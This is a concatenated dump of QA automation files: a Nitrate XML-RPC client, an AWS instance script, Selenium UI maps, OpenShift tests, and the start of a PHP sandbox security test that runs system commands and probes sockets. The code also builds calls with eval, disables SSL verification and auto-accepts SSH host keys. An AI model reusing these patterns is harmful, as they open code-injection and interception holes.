h.set_debuglevel(1)\n\n # ADDED: construct the URL and Request object for proper cookie handling\n request_url = \"%s://%s%s\" % (self.scheme,host,handler)\n #log.debug(\"request_url is %s\" % request_url)\n cookie_request = urllib2.Request(request_url) \n\n self.send_request(h,handler,request_body)\n self.send_host(h,host) \n self.send_cookies(h,cookie_request) # ADDED. creates cookiejar if None.\n self.send_user_agent(h)\n self.send_content(h,request_body)\n\n errcode, errmsg, headers = h.getreply()\n\n # ADDED: parse headers and get cookies here\n cookie_response = CookieResponse(headers)\n # Okay, extract the cookies from the headers\n self.cookiejar.extract_cookies(cookie_response,cookie_request)\n #log.debug(\"cookiejar now contains: %s\" % self.cookiejar._cookies)\n # And write back any changes\n if hasattr(self.cookiejar,'save'):\n try:\n self.cookiejar.save(self.cookiejar.filename)\n except Exception, e:\n raise\n #log.error(\"Couldn't write cookiefile %s: %s\" % \\\n # (self.cookiejar.filename,str(e)))\n\n if errcode != 200:\n raise xmlrpclib.ProtocolError(\n host + handler,\n errcode, errmsg,\n headers\n )\n\n self.verbose = verbose\n\n try:\n sock = h._conn.sock\n except AttributeError:\n sock = None\n\n return self._parse_response(h.getfile(), sock)\n\n # This is just python 2.7's xmlrpclib.Transport.single_request, with\n # send additions noted below to send cookies along with the request\n def single_request_with_cookies(self, host, handler, request_body, verbose=0):\n h = self.make_connection(host)\n if verbose:\n h.set_debuglevel(1)\n\n # ADDED: construct the URL and Request object for proper cookie handling\n request_url = \"%s://%s%s\" % (self.scheme,host,handler)\n #log.debug(\"request_url is %s\" % request_url)\n cookie_request = urllib2.Request(request_url)\n\n try:\n self.send_request(h,handler,request_body)\n self.send_host(h,host)\n self.send_cookies(h,cookie_request) # ADDED. 
creates cookiejar if None.\n self.send_user_agent(h)\n self.send_content(h,request_body)\n\n response = h.getresponse(buffering=True)\n\n # ADDED: parse headers and get cookies here\n cookie_response = CookieResponse(response.msg)\n # Okay, extract the cookies from the headers\n self.cookiejar.extract_cookies(cookie_response,cookie_request)\n #log.debug(\"cookiejar now contains: %s\" % self.cookiejar._cookies)\n # And write back any changes\n if hasattr(self.cookiejar,'save'):\n try:\n self.cookiejar.save(self.cookiejar.filename)\n except Exception, e:\n raise\n #log.error(\"Couldn't write cookiefile %s: %s\" % \\\n # (self.cookiejar.filename,str(e)))\n\n if response.status == 200:\n self.verbose = verbose\n return self.parse_response(response)\n except xmlrpclib.Fault:\n raise\n except Exception:\n # All unexpected errors leave connection in\n # a strange state, so we clear it.\n self.close()\n raise\n\n #discard any response data and raise exception\n if (response.getheader(\"content-length\", 0)):\n response.read()\n raise xmlrpclib.ProtocolError(\n host + handler,\n response.status, response.reason,\n response.msg,\n )\n\n # Override the appropriate request method\n if hasattr(xmlrpclib.Transport, 'single_request'):\n single_request = single_request_with_cookies # python 2.7+\n else:\n request = request_with_cookies # python 2.6 and earlier\n\nclass SafeCookieTransport(xmlrpclib.SafeTransport,CookieTransport):\n '''SafeTransport subclass that supports cookies.'''\n scheme = 'https'\n # Override the appropriate request method\n if hasattr(xmlrpclib.Transport, 'single_request'):\n single_request = CookieTransport.single_request_with_cookies\n else:\n request = CookieTransport.request_with_cookies\n\n# Stolen from FreeIPA source freeipa-1.2.1/ipa-python/krbtransport.py\nclass KerbTransport(SafeCookieTransport):\n \"\"\"Handles Kerberos Negotiation authentication to an XML-RPC server.\"\"\"\n \n def get_host_info(self, host):\n host, extra_headers, x509 = xmlrpclib.Transport.get_host_info(self, host)\n \n # Set the remote host principal\n h = host\n hostinfo = h.split(':')\n service = \"HTTP@\" + hostinfo[0]\n \n try:\n rc, vc = kerberos.authGSSClientInit(service);\n except kerberos.GSSError, e:\n raise kerberos.GSSError(e)\n \n try:\n kerberos.authGSSClientStep(vc, \"\");\n except kerberos.GSSError, e:\n raise kerberos.GSSError(e)\n \n extra_headers = [\n (\"Authorization\", \"negotiate %s\" % kerberos.authGSSClientResponse(vc) )\n ]\n \n return host, extra_headers, x509\n\nclass NitrateError(Exception):\n pass\n\nclass NitrateXmlrpcError(Exception):\n def __init__(self, verb, params, wrappedError):\n self.verb = verb\n self.params = params\n self.wrappedError = wrappedError\n \n def __str__(self):\n return \"Error while executing cmd '%s' --> %s\" \\\n % ( self.verb + \"(\" + self.params + \")\", self.wrappedError)\n\nclass NitrateXmlrpc(object):\n \"\"\"\n NitrateXmlrpc - Nitrate XML-RPC client\n for server deployed without BASIC authentication\n \"\"\"\n @classmethod\n def from_config(cls, filename):\n from ConfigParser import SafeConfigParser\n cp = SafeConfigParser()\n cp.read([filename])\n kwargs = dict(\n [(key, cp.get('nitrate', key)) for key in [\n 'username', 'password', 'url'\n ]]\n )\n \n return NitrateXmlrpc(**kwargs)\n \n def __init__(self, username, password, url, use_mod_auth_kerb = False):\n if url.startswith('https://'):\n self._transport = SafeCookieTransport()\n elif url.startswith('http://'):\n self._transport = CookieTransport()\n else:\n raise \"Unrecognized URL 
scheme\"\n \n self._transport.cookiejar = CookieJar()\n # print \"COOKIES:\", self._transport.cookiejar._cookies\n self.server = xmlrpclib.ServerProxy(\n url,\n transport = self._transport,\n verbose = VERBOSE\n )\n \n # Login, get a cookie into our cookie jar:\n login_dict = self.do_command(\"Auth.login\", [dict(\n username = username,\n password = password,\n )])\n \n # Record the user ID in case the script wants this\n # self.user_id = login_dict['id']\n # print 'Logged in with cookie for user %i' % self.userId\n # print \"COOKIES:\", self._transport.cookiejar._cookies\n \n def _boolean_option(self, option, value):\n \"\"\"Returns the boolean option when value is True or False, else ''\n \n Example: _boolean_option('isactive', True) returns \" 'isactive': 1,\"\n \"\"\"\n if value or str(value) == 'False':\n if type(value) is not BooleanType:\n raise NitrateError(\"The value for the option '%s' is not of boolean type.\" % option)\n elif value == False:\n return \"\\'%s\\':0, \" % option\n elif value == True:\n return \"\\'%s\\':1, \" % option\n return ''\n \n def _datetime_option(self, option, value):\n \"\"\"Returns the string 'option': 'value' where value is a date object formatted\n in string as yyyy-mm-dd hh:mm:ss. If value is None, then we return ''.\n \n Example: self._time_option('datetime', datetime(2007,12,05,13,01,03))\n returns \"'datetime': '2007-12-05 13:01:03'\"\n \"\"\"\n if value:\n if type(value) is not type(datetime(2000,01,01,12,00,00)):\n raise NitrateError(\"The option '%s' is not a valid datetime object.\" % option)\n return \"\\'%s\\':\\'%s\\', \" % (option, value.strftime(\"%Y-%m-%d %H:%M:%S\"))\n return ''\n \n def _list_dictionary_option(self, option, value):\n \"\"\"Verifies that the value passed for the option is in the format of a list\n of dictionaries.\n \n Example: _list_dictionary_option('plan':[{'key1': 'value1', 'key2': 'value2'}])\n verifies that value is a list, then verifies that the content of value are dictionaries.\n \"\"\"\n if value: # Verify that value is a type of list\n if type(value) is not ListType: # Verify that the content of value are dictionaries,\n raise NitrateError(\"The option '%s' is not a valid list of dictionaries.\" % option)\n else:\n for item in value:\n if type(item) is not DictType:\n raise NitrateError(\"The option '%s' is not a valid list of dictionaries.\" % option)\n return \"\\'%s\\': %s\" % (option, value)\n return ''\n \n _list_dict_op = _list_dictionary_option\n \n def _number_option(self, option, value):\n \"\"\"Returns the string \" 'option': value,\" if value is not None, else ''\n \n Example: self._number_option(\"isactive\", 1) returns \" 'isactive': 1,\"\n \"\"\"\n if value:\n if type(value) is not IntType:\n raise NitrateError(\"The option '%s' is not a valid integer.\" % option)\n return \"\\'%s\\':%d, \" % (option, value)\n return ''\n \n def _number_no_option(self, number):\n \"\"\"Returns the number in number. 
Just a totally useless wrapper :-)\n \n Example: self._number_no_option(1) returns 1\n \"\"\"\n if type(number) is not IntType:\n raise NitrateError(\"The 'number' parameter is not an integer.\")\n return str(number)\n \n _number_noop = _number_no_option\n \n def _options_dict(self, *args):\n \"\"\"Creates a wrapper around all the options into a dictionary format.\n \n Example, if args is ['isactive': 1,\", 'description', 'Voyage project'], then\n the return will be {'isactive': 1,\", 'description', 'Voyage project'}\n \"\"\"\n return \"{%s}\" % ''.join(args)\n \n def _options_non_empty_dict(self, *args):\n \"\"\"Creates a wrapper around all the options into a dictionary format and\n verifies that the dictionary is not empty.\n \n Example, if args is ['isactive': 1,\", 'description', 'Voyage project'], then\n the return will be {'isactive': 1,\", 'description', 'Voyage project'}.\n If args is empty, then we raise an error.\n \"\"\"\n if not args:\n raise NitrateError, \"At least one variable must be set.\"\n return \"{%s}\" % ''.join(args)\n \n _options_ne_dict = _options_non_empty_dict\n \n def _string_option(self, option, value):\n \"\"\"Returns the string 'option': 'value'. If value is None, then ''\n \n Example: self._string_option('description', 'Voyage project') returns\n \"'description' : 'Voyage project',\"\n \"\"\"\n if value:\n if type(value) is not StringType:\n raise NitrateError(\"The option '%s' is not a valid string.\" % option)\n return \"\\'%s\\':\\'%s\\', \" % (option, value)\n return ''\n \n def _string_no_option(self, option):\n \"\"\"Returns the string 'option'.\n \n Example: self._string_no_option(\"description\") returns \"'description'\"\n \"\"\"\n if option:\n if type(option) is not StringType:\n raise NitrateError(\"The option '%s' is not a valid string.\" % option)\n return \"\\'%s\\'\" % option\n return ''\n \n _string_noop = _string_no_option\n \n def _time_option(self, option, value):\n \"\"\"Returns the string 'option': 'value' where value is a time object formatted in string as hh:mm:ss.\n If value is None, then we return ''.\n \n Example: self._time_option('time', time(12,00,03)) returns \"'time': '12:00:03'\"\n \"\"\"\n if value:\n if type(value) is not type(time(12,00,00)):\n raise NitrateError(\"The option '%s' is not a valid time object.\" % option)\n return \"\\'%s\\':\\'%s\\', \" % (option, value.strftime(\"%H:%M:%S\"))\n return ''\n \n def do_command(self, verb, args = []):\n \"\"\"Submit a command to the server proxy.\n \n 'verb' -- string, the xmlrpc verb,\n 'args' -- list, the argument list,\n \"\"\"\n params = ''\n for arg in args:\n params = (\"%s\" % str(arg), \"%s, %s\" % (params, str(arg)))[params!='']\n cmd = \"self.server.\" + verb + \"(\" + params + \")\"\n if DEBUG:\n print cmd\n \n try:\n return eval(cmd)\n except xmlrpclib.Error, e:\n raise NitrateXmlrpcError(verb, params, e)\n \n ############################## Build #######################################\n \n def build_get(self, build_id):\n \"\"\"Get A Build by ID.\n \n 'build_id' -- integer, Must be greater than 0\n \n Example: build_get(10)\n \n Result: A dictionary of key/value pairs for the attributes listed above\n \"\"\"\n return self.do_command(\"Build.get\", [self._number_noop(build_id)])\n \n ############################## User ##################################\n def get_me(self):\n \"\"\"\n Description: Get the information of myself\n \n Returns: A blessed User object Hash\n \"\"\"\n return self.do_command(\"User.get_me\")\n\nclass NitrateKerbXmlrpc(NitrateXmlrpc):\n 
\"\"\"\n NitrateXmlrpc - Nitrate XML-RPC client\n for server deployed with mod_auth_kerb\n \"\"\"\n def __init__(self, url):\n if url.startswith('https://'):\n self._transport = KerbTransport()\n elif url.startswith('http://'):\n raise \"Apache module mod_ssl is required by mod_auth_kerb for encrypt the communication.\"\n else:\n raise \"Unrecognized URL scheme\"\n \n self._transport.cookiejar = CookieJar()\n # print \"COOKIES:\", self._transport.cookiejar._cookies\n self.server = xmlrpclib.ServerProxy(\n url,\n transport = self._transport,\n verbose = VERBOSE\n )\n \n # Login, get a cookie into our cookie jar:\n login_dict = self.do_command(\"Auth.login_krbv\", [])\n\nif __name__ == \"__main__\":\n from pprint import pprint\n n = NitrateKerbXmlrpc('https://tcms.englab.nay.redhat.com/xmlrpc/')\n pprint(n.get_me())\n\n" }, { "alpha_fraction": 0.5516973733901978, "alphanum_fraction": 0.555691123008728, "avg_line_length": 33.937984466552734, "blob_id": "258e9df6ddc3df2129e948fce7633c0bc2bd62b3", "content_id": "76acf0fca1c95b05d9c7e3056dbc4d742a953341", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9014, "license_type": "no_license", "max_line_length": 146, "num_lines": 258, "path": "/automation/open/lib/aws_console.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nif sys.platform.startswith('win'):\n #We have to disable CA verification on the Windows boxes...\n #don't know how to fix, but it seems to work without it\n import libcloud.security\n libcloud.security.VERIFY_SSL_CERT = False\n\nfrom libcloud.compute.types import Provider\nfrom libcloud.compute.providers import get_driver\nimport time\nimport paramiko\nimport os\nfrom optparse import OptionParser\nimport datetime\nimport clog\nimport re\n\nlog = clog.get_logger()\nparser = OptionParser()\n\n\ndef ssh_try(host, iterations = 5):\n private_key_file = os.path.expanduser(\"~/.ssh/libra.pem\")\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n mykey = paramiko.RSAKey.from_private_key_file(private_key_file)\n retries = iterations\n can_ssh = False\n while retries !=0:\n try:\n ssh.connect(host, username='root', pkey=mykey)\n can_ssh = True\n break\n except:\n retries -= 1\n #print \"%s Retries: %s\" % (time.ctime(), retries)\n return can_ssh\n\ndef config_parser():\n # these are required options.\n parser.add_option(\"-t\", \"--image_type\", default=\"m1.medium\", help=\"image type (m1.large|m1.small|m1.medium|t1.micro)\") \n parser.add_option(\"-a\", \"--action\", help=\"action you want to take (list|create|store)\")\n parser.add_option(\"-i\", \"--image_name\", help=\"ami_id or devenv number, if none is given, then the latest devenv will be used.\")\n parser.add_option(\"-n\", \"--name\", help=\"name of the instance, if none is given, it will assigned a name pdevenv\") \n (options, args) = parser.parse_args()\n \n # make sure all the ducks are in a row\n if options.action == 'create':\n if options.name is None:\n import uuid\n options.name = \"pdevenv_%s\" % uuid.uuid1().hex[:6]\n log.info(\"No user instance name specified, system will assign auto-generated name \\'%s' as label for the new instance\" % options.name)\n return options, args\n\n\n \nclass AWS_Console(object):\n conn = None\n def __init__(self):\n aws = get_driver(Provider.EC2)\n self._get_credentials()\n self.conn = aws(self.AWSAccessKeyId, self.AWSSecretKey)\n \n def list_nodes(self):\n nodes = 
self.conn.list_nodes()\n #for node in nodes:\n # print \"name: %s\" % node.name\n return nodes\n \n def list_images(self, filter='self'):\n images = self.conn.list_images(filter)\n log.info(\"Found %s images\" % len(images))\n print(\"ID\\t\\t\\tNAME\")\n print(\"---------------------------------------------------\")\n for image in images:\n print(\"%s\\t %s \\t%s\" % (image.id, image.name, image.extra['tag']))\n #self.info(\"xxx\", 1)\n return images\n\n def get_image(self, ami_id):\n image = self.conn.get_image(ami_id)\n return image\n \n def create_node(self, node_name, image, image_type='m1.medium'):\n \"\"\"\n create an new instance based on image object given.\n \"\"\"\n log.info(\"Creating node: %s with image: %s\" % (node_name, image.id))\n sizes = self.conn.list_sizes()\n instance_size = None\n for img_size in sizes:\n if img_size.id == image_type:\n instance_size = img_size\n break\n\n #if image_type in 'm1.large' or image_type in 't1.micro'\n node = self.conn.create_node(name=node_name, image=image, size=instance_size)\n node_avail = False\n print time.ctime()\n while not node_avail:\n nodes = self.conn.list_nodes()\n\n for n in nodes:\n if n.name == node_name:\n if len(n.public_ip) !=0:\n log.info(\"Node with IP: %s is ready\" % n.public_ip[0])\n node_avail = ssh_try(n.public_ip[0])\n log.info(\"Giving the system time to come up...\")\n time.sleep(120)\n return n\n \n if node_avail:\n log.info(\"Node is ready to be used\")\n break\n time.sleep(10)\n return node\n\n def get_all_devenv_images(self, sort_name=True, tag='qe-ready', pattern='devenv'):\n images = self.conn.list_images('self')\n devenv_images = {}\n for image in images:\n if image.extra['tag'] == tag: # ONLY list images that are 'qe-ready'\n name = image.name.split('/')[1]\n if name.startswith(pattern):\n # sort the array so the first element will be the latest image\n if sort_name:\n image_number = int(name.split('_')[1])\n else:\n image_number = name\n devenv_images[image_number] = image\n #print \"NAME: %s\" % name\n return devenv_images\n\n def get_filtered_image(self, pattern):\n images = self.conn.list_images('self')\n pattern_is_ami = False\n image_found = False\n if pattern.startswith('ami'):\n pattern_is_ami = True\n \n if pattern_is_ami:\n try:\n image = self.get_image(pattern)\n image_found = True\n return image\n \n except:\n log.error(\"Can't find matching ami-id '%s' in AWS repo\" %\n pattern)\n sys.exit(1)\n\n for image in images:\n if pattern in image.name:\n image_found = True\n break\n if not image_found:\n log.error(\"Can't find matching image '%s'in AWS repo\" % pattern)\n sys.exit(1)\n\n return image\n\n\n def get_nodes(self):\n nodes = self.conn.list_nodes()\n return nodes\n \n def get_instance(self, label, running=False):\n \"\"\" returns a node instance given the label \"\"\"\n nodes = self.get_nodes()\n if label.startswith('i-'):\n label_is_name = False \n else:\n label_is_name = True\n for node in nodes:\n if running:\n if node.state != 0: #if not running, let's ignore it\n continue\n if label_is_name:\n if node.name == label:\n return node\n else:\n if node.extra['instanceId'] == label:\n return node\n\n\n def stop_node(self, node_name):\n \n node = self.get_instance(node_name)\n self.conn.ex_stop_node(node)\n res = self.conn.ex_create_tags(node, {'Name': 'terminate-me'})\n return node\n\n\n def _get_credentials(self):\n fr = open(os.path.expanduser(\"~/.awscred\"), 'r')\n content = fr.read()\n fr.close()\n obj = re.search(r'AWSAccessKeyId\\s*=\\s*(\\S+)',content)\n if obj:\n 
self.AWSAccessKeyId = obj.group(1)\n else:\n log.error(\"Bad format of ~/.awscred file: AWSAccessKeyId key is missing\")\n obj = re.search(r'AWSSecretKey\\s*=\\s*(\\S+)', content)\n if obj:\n self.AWSSecretKey= obj.group(1)\n else:\n log.error(\"Bad format of ~/.awscred file: AWSSecretKey key is missing\")\n\n return (self.AWSAccessKeyId, self.AWSSecretKey)\n\n\ndef get_ami(instance_ip):\n import paramiko\n import os\n private_key_file = os.path.expanduser(\"~/.ssh/libra.pem\")\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n mykey = paramiko.RSAKey.from_private_key_file(private_key_file)\n\n ssh.connect(instance_ip, username='root', pkey=mykey)\n stdin, stdout, stderr = ssh.exec_command(\"facter | grep ami_id\")\n ami_id = stdout.readline().split('=>')[1].strip()\n return ami_id\n\ndef _test():\n aws = AWS_Console()\n image = aws.get_image('ami-e7c51c8e')\n #node = aws.create_node('libcloud-dev', image)\n #nodes = aws.list_nodes()\n node = aws.create_node('ppp-dev', image, 't1.micro')\n\nif __name__ == '__main__':\n (options, args)= config_parser()\n \n aws = AWS_Console()\n if options.action == 'list':\n log.info(\"Getting a list of images...\")\n images = aws.list_images()\n\n elif options.action == 'create':\n ami_id = None\n if options.image_name is None:\n # find the latest devenv\n image_dict = aws.get_all_devenv_images()\n target_image = image_dict[max(sorted(image_dict))]\n log.info(\"User did not specify an ami or devenv name, using the latest '%s'\" % target_image.name)\n else:\n target_image = aws.get_filtered_image(options.image_name)\n log.info(\"Create instance from ami '%s'...\" % target_image.id)\n aws.create_node(options.name, target_image, options.image_type)\n\n elif options.action == 'stop':\n inst = aws.stop_node(options.name)\n else:\n log.error(\"Unsupported action '%s'\" % options.action)\n parser.print_help()\n" }, { "alpha_fraction": 0.6755386590957642, "alphanum_fraction": 0.6818757653236389, "avg_line_length": 22.205883026123047, "blob_id": "cb0058be1e78a714861432b3aad0ccd3bace1ffe", "content_id": "b5c49ecaeb10357e4701eb546b74b97f9bbd4e81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 789, "license_type": "no_license", "max_line_length": 65, "num_lines": 34, "path": "/automation/Example/ui_mapping/homepage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nUI elements mapping and strings for home page.\n\nAuthor: Xin Gao <[email protected]>\n\"\"\"\n\nfrom selenium.webdriver.common.by import By\n\nfrom hta2.core import UIMap\nfrom hta2.utils.enum import Enum\nfrom hta2.conf import settings as config\n\n\nlocation = config.url\nadmin_url = config.admin_url\n\n# Home page header elements\nheader = Enum(\n login_link = UIMap(By.ID, 'login_link_top'),\n username_input = UIMap(By.ID, 'Bugzilla_login_top'),\n password_input = UIMap(By.ID, 'Bugzilla_password_top'),\n login_btn = UIMap(By.ID, 'log_in_top'),\n admin_link = UIMap(By.XPATH, '//div/ul/li[11]/a'),\n)\n\n# Home page body elements\nbody = Enum(\n quick_search_help_link = (By.LINK_TEXT, 'Quick Search help'),\n)\n\n# Home page footer elements\nfooter = Enum(\n legal_link = (By.LINK_TEXT, 'Legal'),\n)\n" }, { "alpha_fraction": 0.6334841847419739, "alphanum_fraction": 0.6410256624221802, "avg_line_length": 29.136363983154297, "blob_id": "a51bf0f06eae9e971947b6b7f2c7639959c34679", "content_id": "10d41b31456e650bb93bbbbf1c02c0245544e15e", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "no_license", "max_line_length": 105, "num_lines": 44, "path": "/automation/open/testmodules/RT/hot_deploy/php_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nSept 26, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\n\nclass PHPHotDeployWithoutJenkins(HotDeployTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['php']\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"[US2309] Hot deployment support for non-scaling PHP app - without Jenkins\"\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid.php\"\n self.info(\"Editing file '%s'...\" % self.config.file_name)\n php_file = open(\"./%s/php/%s\" % (self.config.application_name, self.config.file_name), \"w\")\n php_file.write(\"<?php\\n\")\n php_file.write(\"header('Content-type: text/plain');\")\n php_file.write(\"echo getmypid();\")\n php_file.write(\"?>\")\n php_file.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PHPHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5140271782875061, "alphanum_fraction": 0.5176470875740051, "avg_line_length": 29.66666603088379, "blob_id": "9c427561734819e6f31d73890716d3114c832c04", "content_id": "3629cf9258fe020c3e520cf944ec6c54212a342c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 88, "num_lines": 36, "path": "/automation/open/testmodules/RT/cucumber/cartridge-php.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\n\n\nif __name__ == '__main__':\n user_email = os.environ[\"OPENSHIFT_user_email\"]\n user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n app_type = \"perl-5.10\"\n app_name = \"testapp\"\n app_repo = \"/tmp/%s_repo\" %(app_name)\n\n common.env_setup()\n steps_list = []\n\n print \"Running this now\"\n feature = os.path.join(WORK_DIR,\"cartridge-php.feature\")\n cmd = \"cucumber %s\" % feature\n step = testcase.TestCaseStep(\"Add Remove Alias a PHP Application\",\n cmd,\n function_parameters=[],\n expect_return=0,\n expect_string_list=[\"no local repo has been created\"],\n )\n\n steps_list.append(step)\n\n case = testcase.TestCase(\"Add Remove Alias a PHP Application\",\n steps_list\n )\n case.run()\n\n" }, { "alpha_fraction": 0.6809903383255005, "alphanum_fraction": 0.6829823851585388, "avg_line_length": 26.4375, "blob_id": "d0b81957a45926b3cbd0b26f1c2d89641f64b57a", "content_id": "3c2fbc55b077eec099e74518384828f28ed9e6d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3514, "license_type": "no_license", "max_line_length": 99, "num_lines": 128, "path": "/automation/open/lib/reports/Email.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nReport objects that sends a text email.\n\n\"\"\"\n\nimport sys, os\nimport reports\nNO_MESSAGE = reports.NO_MESSAGE\n\nfrom cStringIO import StringIO\n\nimport ezmail\n\nclass ReportMessage(ezmail.MIMEMultipart.MIMEMultipart, ezmail.AutoMessageMixin):\n\tdef __init__(self, From=None, To=None):\n\t\tezmail.MIMEMultipart.MIMEMultipart.__init__(self)\n\t\tezmail.AutoMessageMixin.__init__(self, From, To)\n\nclass EmailReport(reports.NullReport):\n\t\"\"\"Create an a report that is emailed, rather than written to a file. \n\tEmailReport(\n\t\t[formatter=\"text/plain\"], # formatter type\n\t\t[recipients=None], # list of recipients, or None. If none the\n\t\t # message is mailed to self (From address).\n\t\t[From=None], # Address for From field. If None the current user is used.\n\t\t)\n\n\t\"\"\"\n\tdef __init__(self, formatter=\"text/plain\", recipients=None, From=None):\n\t\tself._logfile = None\n\t\tself._message = ReportMessage()\n\t\tself._message.From(From)\n\t\tself._message.To(recipients)\n\t\tself._formatter, ext = reports.get_formatter(formatter)\n\n\tfilename = property(lambda s: None)\n\tfilenames = property(lambda s: [])\n\tmimetype = property(lambda s: s._formatter.MIMETYPE)\n\n\tdef initialize(self):\n\t\tself._fo = StringIO()\n\t\tself.write(self._formatter.initialize())\n\n\tdef logfile(self, lf):\n\t\tself._logfile = str(lf)\n\n\tdef write(self, text):\n\t\tself._fo.write(text)\n\n\tdef writeline(self, text):\n\t\tself._fo.write(text)\n\t\tself._fo.write(\"\\n\")\n\n\tdef finalize(self):\n\t\t\"\"\"finalizing this Report sends off the email.\"\"\"\n\t\tself.write(self._formatter.finalize())\n\t\treport = ezmail.MIMEText.MIMEText(self._fo.getvalue(), self._formatter.MIMETYPE.split(\"/\")[1])\n\t\treport[\"Content-Disposition\"] = \"inline\"\n\t\tself._message.attach(report)\n\t\tif self._logfile:\n\t\t\ttry:\n\t\t\t\tlfd = file(self._logfile).read()\n\t\t\texcept:\n\t\t\t\tpass # non-fatal\n\t\t\t\tprint >>sys.stderr, \"could not read or attach log file: %r\" % (self._logfile,)\n\t\t\telse:\n\t\t\t\tlogmsg = ezmail.MIMEText.MIMEText(lfd)\n\t\t\t\tlogmsg[\"Content-Disposition\"] = 'attachment; filename=%s' % (os.path.basename(self._logfile), )\n\t\t\t\tself._message.attach(logmsg)\n\t\tezmail.mail(self._message)\n\n\tdef add_title(self, title):\n\t\tself._message.add_header(\"Subject\", title)\n\t\tself.write(self._formatter.title(title))\n\n\tdef add_heading(self, text, level=1):\n\t\tself.write(self._formatter.heading(text, level))\n\n\tdef add_message(self, msgtype, msg, level=1):\n\t\tself.write(self._formatter.message(msgtype, msg, level))\n\n\tdef add_summary(self, text):\n\t\tself.write(self._formatter.summary(text))\n\n\tdef passed(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"PASSED\", msg)\n\n\tdef failed(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"FAILED\", msg)\n\n\tdef incomplete(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"INCOMPLETE\", msg)\n\n\tdef abort(self, msg=NO_MESSAGE):\n\t\tself.add_message(\"ABORTED\", msg)\n\n\tdef info(self, msg):\n\t\tself.add_message(\"INFO\", msg)\n\n\tdef diagnostic(self, msg):\n\t\tself.add_message(\"DIAGNOSTIC\", msg)\n\n\tdef add_text(self, text):\n\t\tself.write(self._formatter.text(text))\n\n\tdef add_url(self, text, url):\n\t\tself.write(self._formatter.url(text, url))\n\n\tdef newpage(self):\n\t\tself.write(self._formatter.newpage())\n\n\tdef 
newsection(self):\n\t\tself.write(self._formatter.section())\n\n\n\nif __name__ == \"__main__\":\n\trpt = EmailReport(\"text/plain\", recipients=[\"[email protected]\"])\n\trpt.initialize()\n\trpt.add_title(\"Email report self test.\")\n\trpt.info(\"Some non-useful info. 8-)\")\n\trpt.finalize()\n\n\n" }, { "alpha_fraction": 0.49139344692230225, "alphanum_fraction": 0.49877050518989563, "avg_line_length": 26.11111068725586, "blob_id": "92f237625eee53f5eb08a50b04519c5173d2f7b8", "content_id": "e5d6c9a0fb982832a7c0090fad09a6dcf636ca20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2440, "license_type": "no_license", "max_line_length": 71, "num_lines": 90, "path": "/automation/open/testmodules/RT/security/data/execute_risky_system_binaries.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n\nfunction run_system_cmd($command) {\n$io = array();\n$p = proc_open($command,\n array(1 => array('pipe', 'w'),\n 2 => array('pipe', 'w')),\n $io);\n\n/* Read output sent to stdout. */\nwhile (!feof($io[1])) {\n $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),\n ENT_COMPAT, 'UTF-8');\n}\n\n/* Read output sent to stderr. */\nwhile (!feof($io[2])) {\n $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),\n ENT_COMPAT, 'UTF-8');\n}\n\n\nfclose($io[1]);\nfclose($io[2]);\nproc_close($p);\n\nreturn $_SESSION['output'];\n}\n\nfunction socket_binding($port) {\n error_reporting(E_ALL);\n $address = 'localhost';\n $service_port = $port;\n \n echo \"Connecting \".$address.\":\".$service_port.\"\\n\";\n echo \"Create socket..........\\n\";\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n if ($socket === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET CREATE: Fail-1. \\n\";\n } else {\n echo \"SOCKET CREATE: OK-1.\\n\";\n }\n \n \n echo \"Connect socket..........\\n\";\n $result = socket_connect($socket, $address, $service_port);\n if ($result === false) {\n $error_id = socket_last_error();\n echo \"Error: \".$error_id.\" - \".socket_strerror($error_id).\"\\n\";\n echo \"SOCKET CONNECT: Fail-2. \\n\";\n $RESULT=\"PASS\";\n } else {\n echo \"SOCKET CONNECT: OK-2.\\n\";\n $RESULT=\"FAIL\";\n 